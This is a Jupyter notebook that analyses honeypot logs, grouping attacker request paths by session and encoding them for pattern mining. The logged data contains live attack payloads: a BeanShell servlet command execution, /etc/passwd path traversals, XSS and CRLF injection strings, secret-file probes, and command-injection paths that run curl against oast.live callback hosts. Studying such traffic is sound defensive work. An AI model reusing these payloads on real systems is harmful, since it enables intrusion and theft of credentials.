In [1]:
import pandas as pd

df = pd.read_json("../tanner_report.json", lines=True)

df.head(5)

,method,path,headers,uuid,peer,status,cookies,response_msg,timestamp,post_data
0,GET,/,"{'host': '127.0.0.1', 'user-agent': 'curl/7.81...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 38070}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:04.130283,NaN
1,HEAD,/,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58198}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.383736,NaN
2,POST,/public/index.php/material/Material/_download_...,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58252}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.481975,"{'""1"":1': ''}"
3,POST,/servlet/~ic/bsh.servlet.BshServlet,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58270}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.484291,"{'bsh.script': 'exec(""id"");'}"
4,POST,/dataSetParam/verification;swagger-ui/,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58212}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.488787,{}

In [2]:
# get the paths with params
# filtered_paths = filtered_df["path"]

# get the paths without params
df["path"] = df["path"].apply(lambda x: x.split('?', 1)[0])

df.head(5)

,method,path,headers,uuid,peer,status,cookies,response_msg,timestamp,post_data
0,GET,/,"{'host': '127.0.0.1', 'user-agent': 'curl/7.81...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 38070}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:04.130283,NaN
1,HEAD,/,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58198}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.383736,NaN
2,POST,/public/index.php/material/Material/_download_...,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58252}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.481975,"{'""1"":1': ''}"
3,POST,/servlet/~ic/bsh.servlet.BshServlet,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58270}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.484291,"{'bsh.script': 'exec(""id"");'}"
4,POST,/dataSetParam/verification;swagger-ui/,"{'host': '127.0.0.1', 'user-agent': 'Mozilla/5...",2499449e-0489-48f5-9aef-7e98a82288bc,"{'ip': '172.18.0.1', 'port': 58212}",200,{'sess_uuid': None},"{'version': '0.6.0', 'response': {'message': {...",2025-06-16 07:52:12.488787,{}

In [3]:
paths_matrix = []
tmp = []
sess_uuids_paths = {
  # "{sess_uuid}": []
}
sess_uuids = []

for _, row in df.iterrows():
  sess_uuid = row.get("cookies", {}).get("sess_uuid") or row.get("response_msg", {}).get("response", {}).get("message", {}).get("sess_uuid")
  path = row["path"]

  if sess_uuid in sess_uuids:
    sess_uuids_paths[sess_uuid].append(path)
  else:
    sess_uuids_paths[sess_uuid] = [path]
    sess_uuids.append(sess_uuid)

paths_matrix = list(sess_uuids_paths.values())
# for paths in sess_uuids_paths.values():
#   paths_matrix.append(paths)

sess_uuids_paths
# paths_matrix
# print(len(paths_matrix), len(sess_uuids_paths.keys()))

{'f406da90-dfee-48da-901a-601277cb485f': ['/'],
 'ca780e31-fc2d-43d3-bca8-86e2be49aa0f': ['/',
  '/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php',
  '/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php',
  '/index.html',
  '/index.html',
  '/api/v1/database/6',
  '/home/vtytt.php',
  '/manager/html',
  '/CDGServer3/SystemConfig',
  '/bin.jar',
  '/graph',
  '/cgi-bin/Save.cgi',
  '/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash',
  '/index.php',
  '/index.php',
  '/agc/vicidial_mysqli_errors.txt'],
 'b711708d-5a4a-43f5-be01-bcfb56905013': ['/public/index.php/material/Material/_download_imgage',
  '/module/ph_simpleblog/list',
  '/module/ph_simpleblog/list',
  '/manager/html',
  '/index.php',
  '/login',
  '/web.bz2',
  '/api/v4/users/87',
  '/admin.war',
  '/..%5c..%5cetc/passwd',
  '/asd/../../../../../../../../etc/passwd',
  '/html/2word',
  '/.styleci.yml'],
 '1361067b-0089-46c4-9269-968cb8aa98d5': ['/servlet/~ic/bsh.servlet.BshServlet',
  '/index.php',
  '/manager/html',
  '/public/plugins/esnet-matrix-panel/../../../../../conf/defaults.ini',
  '/wp-includes/rss-functions.php',
  '/_syslog.txt',
  '/',
  '/ocp.php',
  '/////bin///querybuilder.json.servlet',
  '/seeyon/personalBind.do.jpg/..;/ajax.do'],
 '6ac16e1e-2df0-4887-88df-b6b1cf6750aa': ['/dataSetParam/verification;swagger-ui/',
  '/',
  '/login.do',
  '/v1/sys/health',
  '/backup_1.bz2',
  '/https:%0a%0doast.me',
  '/index.php',
  '/index.php',
  '/',
  '/',
  '/admin/login.jsp'],
 '1c44fb9f-977f-41fc-9c09-6e8d01341ce6': ['/cgi-bin/rpc',
  '/0.sql.zip',
  '/Release.tar.z',
  '/wp-content/plugins/sucuri-scanner/readme.txt',
  '/../WEB-INF/web.xml;x=',
  '/public/plugins/singlestat/../../../../../conf/defaults.ini',
  '/_vti_pvt/service.cnf',
  '/scriptcase/prod/lib/php/',
  '/sftp.json',
  '/cluster/cluster'],
 'da733e50-f33d-4d70-bf57-444415073907': ['/WEB_VMS/LEVEL15/',
  '/wp-content/plugins/imagements/images/2ya6s0ubccfsfqxw2zqvrndkmxm.php',
  '/controller/login.php',
  '/index.php',
  '/api/2.0/mlflow/registered-models/create',
  '/model-versions/get-artifact',
  '/manager/html',
  '/html.sql.lz',
  '/test.tgz',
  '/wp-content/plugins/backuply/readme.txt',
  '/Release.7z',
  '/https:///oast.me@oast.me/%2e%2e',
  '/phpmyadmin/index.php',
  '/_nuxt/@fs/windows/win.ini',
  '/_next/../../../../../../../../../etc/passwd',
  '/',
  '/actuator',
  '/favicon.ico',
  '/actuator/favicon.ico'],
 'b3869635-b872-46e9-ae55-c5e7130823c2': ['/index.php/User/doLogin',
  '/api/blade-user/user-list',
  '/index.htm',
  '/manager/html',
  '/api/docs/',
  '/2025.sql.7z',
  '/ROOT.tar.gz',
  '/WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId',
  '/portal/images/MyVue/MyVueHelp.png',
  '/wp-admin/setup-config.php',
  '/admin/login',
  '/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4'],
 '6a61bd65-e113-48e2-9eb9-e2ec1a81e11d': ['/zentao/user-login.html',
  '/wp-json/lp/v1/courses/archive-course',
  '/',
  '/swagger',
  '/servlet/taskProc/',
  '/wp-content/plugins/mailchimp-for-wp/readme.txt',
  '/data.bz2',
  '/upload.sqlite',
  '/wp-content/plugins/wp-seopress/readme.txt',
  '/.env.local'],
 '27a7b372-b7b2-4514-bc04-1408bb28f4b4': ['/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet',
  '/index.php',
  '/ROOT.z',
  '/htdocs.Z',
  '/home/courses',
  '/config_application.txt',
  '/',
  '/register'],
 'e8ec8669-7578-47af-8a30-129f76a2366e': ['/upgrade/detail.jsp/login/LoginSSO.jsp',
  '/',
  '/modules/leocustomajax/leoajax.php',
  '/.env.live',
  '/////etc.children.1.json',
  '/api/v4/users/19',
  '/index.php',
  '/index.php',
  '/index.php',
  '/config.html',
  '/duomiphp/ajax.php',
  '/service/v1/service-details'],
 '8ce0a3cc-7fa7-4e1e-8624-34d38d521c0e': ['/public/index.php',
  '/file=%3C%21DOCTYPE',
  '/openam/XUI',
  '/127.0.tar',
  '/upload.jar',
  '/public/plugins/alertmanager/../../../../../conf/defaults.ini',
  '/',
  '/',
  '/index.php',
  '/index.php'],
 '6488d57d-d911-44dc-b464-52f886e05438': ['/service/~iufo/com.ufida.web.action.ActionServlet',
  '/wp-admin/admin-ajax.php',
  '/wp-admin/admin-ajax.php',
  '/ajax-api/2.0/mlflow/model-versions/create',
  '/admin/',
  '/manager/html',
  '/0.1.lz',
  '/uploads.sql.zip',
  '/xampp/phpmyadmin/scripts/setup.php',
  '/wp-content/plugins/fast-indexing-api/readme.txt',
  '/public/plugins/pyroscope-panel/../../../../../conf/defaults.ini',
  '/static/login/favicon.ico',
  '/favicon.ico',
  '/ipython/tree',
  '/index.php',
  '/index.php'],
 '48b351b5-5b81-4d6d-98e1-0a6475a1defc': ['/mobile/plugin/browser.jsp',
  '/uapjs/jsinvoke/',
  '/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd',
  '/Release.bz2',
  '/v4/graphiql/finland',
  '/ad-list-search',
  '/wp-content/plugins/usc-e-shop/functions/progress-check.php',
  '/.viminfo',
  '/wp-content/plugins/usc-e-shop/functions/progress-check.php'],
 '13529ce9-1616-46f2-ad6e-e5f26da203fb': ['/seeyon/htmlofficeservlet',
  '/webapi/auth',
  '/manager/html',
  '/etc.json',
  '/upload.z',
  '/public/plugins/agenty-flowcharting-panel/../../../../../conf/defaults.ini',
  '/',
  '/system/bgservlets/test.css',
  '/ccmivr/IVRGetAudioFile.do',
  '/ccmivr/IVRGetAudioFile.do',
  '/javax.faces.resources/faces-config.xml.jsf',
  '/',
  '/BACLIENT',
  '/JNLP',
  '/cms/admin/group/all'],
 'ad467561-17b0-4aac-9dd1-a8ba7a280b93': ['/',
  '/',
  '/keepalive.php',
  '/users;.',
  '/openam/XUI/',
  '/backup_4.tar',
  '/system/help/support',
  '/OA_HTML/jsp/bsc/bscpgraph.jsp',
  '/OA_HTML/jsp/bsc/bscpgraph.jsp',
  '/wp-content/plugins/simple-file-list/includes/ee-downloader.php',
  '/versa/dist/images/versa-logo.png'],
 'f19cfd55-07c3-4209-9e3d-374af765f671': ['/',
  '/wp-admin/options-general.php',
  '/app',
  '/admin/login',
  '/wp-json/sure-triggers/v1/automation/action',
  '/api/login',
  '/update.sh',
  '/wwwroot.tar.z',
  '/public_html.sql.gz',
  '/mgmt/tm/sys/management-ip',
  '/HyperGraphQL',
  '/wp-content/plugins/webp-converter-for-media/readme.txt',
  '/p/login/'],
 '08f86f59-49d1-4ada-a68a-0599384ea9a4': ['/users/sign_in',
  '/myaccount/javax.faces.resource/web.xml',
  '/api/graphql',
  '/prod.ini',
  '/.github/workflows/test.yaml',
  '/private.pem',
  '/uploads.sql.z',
  '/phpmyadmin/setup/',
  '/v3/playground',
  '/wp-content/plugins/jetpack-boost/readme.txt',
  '/ftp.z',
  '/src.xz',
  '/Login',
  '/cmd',
  '/_config',
  '/public/login.html',
  '/index.php/Home/uploadify/fileList'],
 '33147e86-2bb3-4653-94d9-b533b94ba32e': ['/wp-content/plugins/sniplets/readme.txt',
  '/manager/html',
  '/ssl.txt',
  '/.json/FNZ.css',
  '/uploads.tgz',
  '/version',
  '/inetpub.gz',
  '/pmb/opac_css/ajax.php',
  '/pma/index.php',
  '/',
  '/ztp/cgi-bin/handler',
  '/server/wwtest/phpinfo.php',
  '/composer.lock',
  '/pre/config.php'],
 '165640df-a690-42c4-a072-c616353eec7a': ['/public/index.php/home/file/user_pics',
  '/render/public/..%252f%255Cd17sqb1q6jvuuc1vrlog5cjtcxebr6h6f.oast.live%252f%253F%252f..%252f..',
  '/psp/csprd/',
  '/2025.Z',
  '/wp-content/plugins/autoptimize/readme.txt',
  '/data.z',
  '/properties/',
  '/wp-content/plugins/brandfolder/callback.php',
  '/log/view',
  '/log/view',
  '/NmConsole'],
 'a6e4e87f-6a3c-472d-8915-39b287aca9c4': ['/servlet/~ic/bsh.servlet.BshServlet',
  '/api/runscript',
  '/index.php',
  '/',
  '/public.bz2',
  '/api/v4/users/16',
  '/fiori',
  '/api/metrics'],
 '7394fbab-3a2d-4621-aac6-41160d2c401c': ['/images/logo/logo-eoffice.php',
  '/search-locker-details.php',
  '/api/v1/database/9',
  '/default/en_US/status.html',
  '/conf/conf.sql.lz',
  '/conf/conf.sql.zip',
  '/wp-content/plugins/slideshow-jquery-image-gallery/readme.txt',
  '/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'],
 'da895010-c8ea-45e1-b927-c6e2e12d6d95': ['/servlet/codesettree',
  '/WSVulnerabilityCore/VulCore.asmx',
  '/manager/html',
  '/api/v4/users/44',
  '/v2/graph',
  '/wp-content/plugins/easy-fancybox/readme.txt',
  '/wp-content/plugins/gutenberg/readme.txt',
  '/.env_1',
  '/common/config.php.new'],
 '859b79d7-8087-438f-8c74-6ec9fac185a7': ['/axis2-admin/login',
  '/wp-content/uploads/html2wp/2ya6RrMISPI75ZTYimQ5Tlp7apz.php',
  '/ajax-api/2.0/mlflow/model-versions/create',
  '/management/export.php',
  '/login',
  '/site_cg/routes/configs/routes.ini',
  '/bak.tar.gz',
  '/////oast.me%5Ctoast.me/',
  '/public/plugins/clarity89-finnhub-datasource/../../../../../conf/defaults.ini',
  '/tmui/login.jsp',
  '/test.txt',
  '/%c0'],
 '01bdd406-4b5b-4e86-a1b6-589d95ea0bfd': ['/axis2/axis2-admin/login',
  '/api/snapshots',
  '/hax/..CFIDE/adminapi/_servermanager/servermanager.cfc',
  '/_sql',
  '/~projects',
  '/nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml',
  '/manager/html',
  '/index.php',
  '/db.sql.7z',
  '/upload.zip',
  '/static/shards/html',
  '/kiali/api/status',
  '/adm_program/system/redirect.php',
  '/',
  '/index.php',
  '/plugins/CoreHome/images/favicon.png'],
 '6d898ba8-65a0-4fb5-90f8-8d1e9d6168a1': ['/wp-content/plugins/advanced-text-widget/readme.txt',
  '/vendor/qcubed/qcubed/assets/php/profile.php',
  '/manager/html',
  '/127.0.bz2',
  '/.ssh/id_rsa_1024',
  '/web.sql.tar.z',
  '/pma/setup/index.php',
  '/wp-content/plugins/all-in-one-seo-pack/readme.txt',
  '/////oast.me//',
  '/public/plugins/computest-cloudwatchalarm-datasource/../../../../../conf/defaults.ini',
  '/wxjsapi/saveYZJFile',
  '/pimcore/app/config/pimcore/google-api-private-key.json',
  '/system-diagnostics',
  '/administrator/'],
 '508ff3b3-10bb-4bc0-aa14-35ace8d08f0c': ['/wp-content/plugins/flash-album-gallery/readme.txt',
  '/wwwroot.tar',
  '/wp-content/plugins/sticky-header-effects-for-elementor/readme.txt',
  '/.env.old',
  '/royal_event/companyprofile.php',
  '/cgi-bin/',
  '/log/vpn.log'],
 '08da8c15-e83d-4808-87c8-4c142ff1c81a': ['/login-x.php',
  '/wp-admin/admin-ajax.php',
  '/webtools/control/SOAPService',
  '/manager/html',
  '/',
  '/127.0.0.1.bz2',
  '/',
  '/phpMyAdmin/index.php',
  '/wp-admin/admin-ajax.php',
  '/update.php',
  '/app/config/security.yml',
  '/message'],
 '6420ba21-9855-4a7a-9de7-ac91da6a0dcf': ['/wp-content/plugins/adminimize/readme.txt',
  '/zabbix/zabbix.php',
  '/',
  '/wp-content/plugins/paid-memberships-pro/js/updates.js',
  '/',
  '/php/node_info.php',
  '/backup_4.Z',
  '/wp-content/plugins/wp-statistics/readme.txt',
  '/install/checks',
  '/fastcgi.conf',
  '/admin/public/login.jsp',
  '/'],
 '0bbfa63d-b8a1-4a76-8b92-4d5f5bead69b': ['/seeyon/test123456.jsp',
  '/wp-admin/admin.php',
  '/api/experimental/test',
  '/wp-login.php',
  '/////etc.children....4.2.1....json',
  '/v1/api/graphql',
  '/dump.sql.rar',
  '/v2/graphql',
  '/wp-content/plugins/webp-express/readme.txt',
  '/UploadService/Page/',
  '/',
  '/webmail/',
  '/log',
  '/nuxeo/login.jsp'],
 'a3ca4d3b-e033-4538-8a91-f6c61ccdcaff': ['/',
  '/jeecg-boot/jmreport/qurestSql',
  '/',
  '/_session',
  '/logs/error.log',
  '/api.gz',
  '/upload.sql.xz',
  '/public/plugins/gridprotectionalliance-osisoftpi-datasource/../../../../../conf/defaults.ini',
  '/bin/deletespace/Sandbox/',
  '/Connect.do'],
 'e8052535-7a23-4de3-b2ff-1d8add2f4997': ['/wp-content/plugins/skysa-official/readme.txt',
  '/php/ping.php',
  '/secserver/',
  '/2025.tgz',
  '/miscadmin',
  '/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId',
  '/servlet/mstrWebAdmin/',
  '/wp-content/uploads/download-manager-files/',
  '/index.html'],
 '8b036c10-02b7-45a1-b0d4-1017f9ffa123': ['/wp-content/plugins/clickdesk-live-support-chat/readme.txt',
  '/geoserver/ows',
  '/manager/html',
  '/_session',
  '/error_log.txt',
  '/backup_1.tar.gz',
  '/backup_4.sql.tar.z',
  '/download/index.php',
  '/admin/suppliers/view_details.php',
  '/download/index.php'],
 '23cd789c-b06f-4cdf-8899-231633d50283': ['/wp-content/plugins/featurific-for-wordpress/readme.txt',
  '/auth/login',
  '/sso/XUI',
  '/.json/FNZ.ico',
  '/app.7z',
  '/backup.sql.7z',
  '/backup_4.sqlitedb',
  '/bin.lz',
  '/db.7z',
  '/etc/passwd',
  '/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini',
  '/admin',
  '/api/v1/canal/config/1/1',
  '/en/products',
  '/checker/login.php'],
 '72172980-b2a7-40ee-9860-f2af9211728d': ['/',
  '/wp-content/plugins/s3-video/readme.txt',
  '/index.php',
  '/',
  '/api/sys/set_passwd',
  '/',
  '/api/v2/simulation',
  '/js../.git/config',
  '/test.xz',
  '/sql.xz',
  '/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx',
  '/',
  '/WS_FTP.LOG'],
 'f1f03c14-50f2-4359-801c-22cb33eb232a': ['/wp-content/plugins/all-in-one-event-calendar/readme.txt',
  '/openam/XUI/Login',
  '/v2/playground',
  '/inetpub.tar.z',
  '/public/plugins/nodeGraph/../../../../../conf/defaults.ini',
  '/wp-config.php.SAVE',
  '/wp-content/plugins/under-construction-maintenance-mode/readme.txt',
  '/pentaho/Login',
  '/versa/app/img/versa-logo.png',
  '/wp-content/plugins/w3-total-cache/pub/minify.php'],
 '72d1c19a-229d-4628-b5ad-3e528cee9949': ['/reports/rwservlet/showenv',
  '/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
  '/config/pw_snmp_done.html',
  '/config/pw_snmp.html',
  '/wp-admin/admin-post.php',
  '/',
  '/flash/addcrypted2',
  '/manager/html',
  '/manager/html',
  '/uploads.sql.bz2',
  '/https%3a%2f%2foast.me%2f',
  '/',
  '/identification.php'],
 '693f2d17-32c3-4dfa-ae43-a01e7223bb61': ['/wp-content/plugins/wp-facethumb/readme.txt',
  '/libs/granite/core/content/login.html/j_security_check',
  '/oauth/token',
  '/dump.sql.z',
  '/file/fileNoLogin/%7B%7Bidname%7D%7D',
  '/gsearch.php.en',
  '/en-US/login'],
 'ed86cb09-811d-4c9d-9d92-a6c4e569e607': ['/index.php',
  '/interface-data/books-init',
  '/bin.war',
  '/dump.sql.tar.gz',
  '/upload.sqlitedb',
  '/old.sql.bz2',
  '/blast/nph-viewgif.cgi',
  '/opensis/ajax.php',
  '/opensis/ajax.php'],
 '3135e605-c2ba-4d79-bbdc-270e5d0e69f5': ['/wp-content/plugins/mf-gig-calendar/readme.txt',
  '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
  '/service-worker.js',
  '/public/checklogin.htm',
  '/authorize',
  '/db.xz',
  '/output.tar.bz2',
  '/uFVntQ.jsp',
  '/remote/loginredir',
  '/gallery/zp-core/setup/index.php',
  '/sync/dropbox/download',
  '/setup/setupcluster-start.action'],
 '4d83b715-85d2-4167-ba79-fc6dbb837e3b': ['/wp-content/plugins/2-click-socialmedia-buttons/readme.txt',
  '/druid/indexer/v1/sampler',
  '/cmisatom/cmis-online/query',
  '/manager/html',
  '/login/userverify.cgi',
  '/users/login',
  '/cms/portlets/Telerik.Web.UI.DialogHandler.aspx',
  '/web/login'],
 '8b20a28f-70d5-4f61-b08f-10f5c228ff3e': ['/wp-content/plugins/download-monitor/readme.txt',
  '/tos/index.php',
  '/dana-na/auth/saml-sso.cgi',
  '/manager/html',
  '/manager/html',
  '/api/v2/login',
  '/db_backup.bak',
  '/db.sql.gz',
  '/wp-content/plugins/wordfence/readme.txt',
  '////cmd.php',
  '/crossdomain.xml',
  '/res/../admin/diagnostic.jsp'],
 'a3ad279d-f1ed-466d-9ba4-fd36f97cf456': ['/wp-content/plugins/advanced-text-widget/advancedtext.php',
  '/index.action',
  '/scp/login.php',
  '/Synchronization',
  '/manager/html',
  '/cfide/componentutils/login.cfm',
  '/',
  '/authorization.do',
  '/wp-content/plugins/constant-contact-forms/vendor/constantcontact/constantcontact/test/Json/Auth/token_info.json',
  '/download.php'],
 '90d17c4f-f8f7-458f-82f2-5d9c15bac17f': ['/wp-content/plugins/wp-integrator/readme.txt',
  '/api/users',
  '/manager/html',
  '/htdocs.sql.lz',
  '/altair',
  '/laravel-filemanager',
  '/config/env.js',
  '/iNotes/Forms85.nsf'],
 'bf4d00ff-56a9-43e7-873f-f41eb1c6dd55': ['/wp-content/plugins/age-verification/age-verification.php',
  '/wp-admin/admin-ajax.php',
  '/.env.local',
  '/cgi-bin/common/login/webLogin',
  '/shop/products',
  '/artemis;/env;'],
 'b038543c-f305-43bd-93da-55f55d358533': ['/wp-content/plugins/uploader/readme.txt',
  '/index.php/video/',
  '/v1/agent/check/register',
  '/',
  '/administrator/components/com_joommyadmin/phpmyadmin/',
  '/database.sql.7z',
  '/inetpub.xz',
  '/wp-content/plugins/jetpack/readme.txt',
  '/conf/conf.tgz',
  '/public/plugins/boazreicher-mosaicplot-panel/../../../../../conf/defaults.ini',
  '/public/plugins/linksmart-sensorthings-datasource/../../../../../conf/defaults.ini',
  '/pyproject.toml',
  '/mics/login.jsp'],
 '94200f3c-eda8-4c55-bdad-fea94f7d1d4a': ['/wp-content/plugins/trafficanalyzer/readme.txt',
  '/auth/realms/master/clients-registrations/default',
  '/mod/lti/auth.php',
  '/index.php',
  '/api/v1/database/6',
  '/',
  '/',
  '/manager/html',
  '/shop/application/configs/application.ini',
  '/home',
  '/api/v4/users/69',
  '/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx',
  '/dump.tgz',
  '/wp-content/plugins/intuitive-custom-post-order/readme.txt',
  '/https:/oast.me',
  '/inizio.php',
  '/inizio.php',
  '/',
  '/xphoneconnect/admin/Login.aspx',
  '/api/v2.0/systeminfo'],
 '52af8efc-9a1a-45dd-9bf9-e76c0590f0e9': ['/index.action',
  '/',
  '/',
  '/info.php',
  '/manager/html',
  '/web/rest/v1/login/sessions',
  '/api/swagger/static/index.html',
  '/.env.stage',
  '/webapps.db',
  '/je/graphql',
  '/SetupConfig.xml',
  '/i3geo/exemplos/codemirror.php',
  '/i3geo/exemplos/codemirror.php',
  '/.netrc',
  '/Solar_SlideSub.php'],
 'ebca9f83-0a91-44db-bf86-bc589019a1f6': ['/login.action',
  '/manager/html',
  '/manager/html',
  '/api/v4/users/39',
  '/MicroStrategy/',
  '/v2/graphql/console',
  '/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx',
  '/admin/ajax.php',
  '/sample.htaccess',
  '/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html',
  '/admin/ajax.php',
  '/wp-admin/admin-ajax.php',
  '/haproxy'],
 '182d47a9-50df-4ec3-879e-bf9ecc703c38': ['/index.action',
  '/admin/index.php',
  '/navigate/login.php',
  '/api/v1/database/1',
  '/classes/common/busiFacade.php',
  '/config/pw_left_bar.html',
  '/htdocs.war',
  '/api/v4/users/10',
  '/bak.tar',
  '/sql.rar',
  '/data.sql.gz',
  '/cfide-scripts/ajax/package/cfajax.js',
  '/hmc/hybris',
  '/cgi-bin/broker',
  '/cgi-bin/broker',
  '/',
  '/akuiteo.collabs/login/login.html',
  '/akuiteo/login.html/'],
 '7a1683ee-857d-44dd-a735-e51074ed84e8': ['/login.action',
  '/db.7z',
  '/cgi-bin/GetSrvInfo.exe',
  '/.idea/httpRequests/http-requests-log.http'],
 '208bef67-8f59-4e83-b8a6-7b372d1cae49': ['/login.action',
  '/vpn/user/download/client',
  '/vpn/user/download/client',
  '/index.php',
  '/jtcgi/r/adlogin/sso',
  '/login.html',
  '/control/userimage.html',
  '/www.sql',
  '/database.sql.z',
  '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00',
  '////hB3jS0DT%22%3E%3Cimg%20src=a%20onerror=alert%28document.domain%29%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'],
 '5aec79f0-e4c7-4439-ada2-6f2187850fc3': ['/index.action',
  '/admin/login',
  '/manager/html',
  '/service/',
  '/pma/server_import.php',
  '/wp-config-backup.txt',
  '/ccm-web/'],
 '1c848754-e064-4a64-9576-e9f138f9661e': ['/index.action',
  '/ckeditor/samples/plugins/htmlwriter/outputhtml.html',
  '/wwwroot.gz',
  '/appliance/login',
  '/redmine/config/settings.yml',
  '/system/login',
  '/dashboard/favicon.ico'],
 '5959acfc-f17b-4a2b-a40d-8c7207ce29a9': ['/index.action',
  '/rpc.cgi',
  '/nezjZahyvl.txt',
  '/apisix/batch-requests',
  '/wp-content/plugins/import-xml-feed/readme.txt',
  '/geoserver/wfs',
  '/manager/html',
  '/0.sqlite',
  '/wwwroot.db',
  '/sysadmin/phpMyAdmin/scripts/setup.php',
  '/bak.xz',
  '/',
  '/%E3%80%B5oast.me',
  '/blog-search',
  '/zms/admin/index.php',
  '/home/0-WORDPRESS.txt',
  '/login/hostinfo2.cgi',
  '/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php',
  '/',
  '/login',
  '/generatedHomepage.html'],

In [4]:
from mlxtend.preprocessing import TransactionEncoder

te = TransactionEncoder()
te_ary = te.fit(paths_matrix).transform(paths_matrix)
df = pd.DataFrame(te_ary, columns=te.columns_)

df

,/,/%00/oast.me/,"/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d17sqb1q6jvuuc1vrlogspbd7wo6w19r8.oast.live+-H+%27User-Agent:+7TNBDe%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d17sqb1q6jvuuc1vrlogt6gnojofi4bd5.oast.live+-H+%27User-Agent:+7TNBDe%27%7D;","/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d17sqb1q6jvuuc1vrlog3ekfnwucn4z9f.oast.live+-H+%27User-Agent:+7TNBDe%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d17sqb1q6jvuuc1vrlogra7rtmj3ezm3d.oast.live+-H+%27User-Agent:+7TNBDe%27%7D;",/%09/oast.me/,/%0A/interact.sh/,/%0ASet-Cookie%3Acrlfinjection/..,/%0ASet-Cookie:crlfinjection=crlfinjection,/%0D%0ASet-Cookie:crlfinjection=crlfinjection,/%0DSet-Cookie:crlfinjection=crlfinjection,...,/zimbraAdmin/,/zimbraAdmin/0MVzAe6pgwe5go1D.jsp,/zm/,/zm/index.php,/zms/admin/index.php,/zp-core/setup/index.php,/zp/zp-core/setup/index.php,/ztp/cgi-bin/handler,/~projects,/~sicom/mgrng/LoginForm.php
0,True,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
1,True,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
2,False,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
3,True,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
4,True,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
924,False,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
925,False,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
926,False,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
927,False,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False
928,False,False,False,False,False,False,False,False,False,False,...,False,False,False,False,False,False,False,False,False,False

In [5]:
